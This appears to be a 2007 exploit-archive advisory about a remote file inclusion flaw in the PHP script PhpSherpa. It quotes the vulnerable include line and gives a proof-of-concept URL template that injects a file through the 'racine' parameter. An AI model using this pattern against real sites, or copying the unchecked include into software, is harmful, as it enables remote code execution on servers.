[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PhpSherpa (include/config.inc.php) Remote File Include Vulnerability
# Published : 2007-01-20
# Author : 3l3ctric-Cracker
# Previous Title : Upload Service 1.0 (top.php maindir) Remote File Inclusion Vulnerability
# Next Title : Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability
------------------------------------------------------------------------------------------------------------------------
Script:PhpSherpa
Affected Version:....
Downlaoad:http://linuxeduquebec.org/IMG/tgz/sherpa.tgz
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (include/config.inc.php)
Vul Code;
include($racine."include/connect.inc.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/include/config.inc.php?racine=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------
# www.Syue.com [2007-01-20]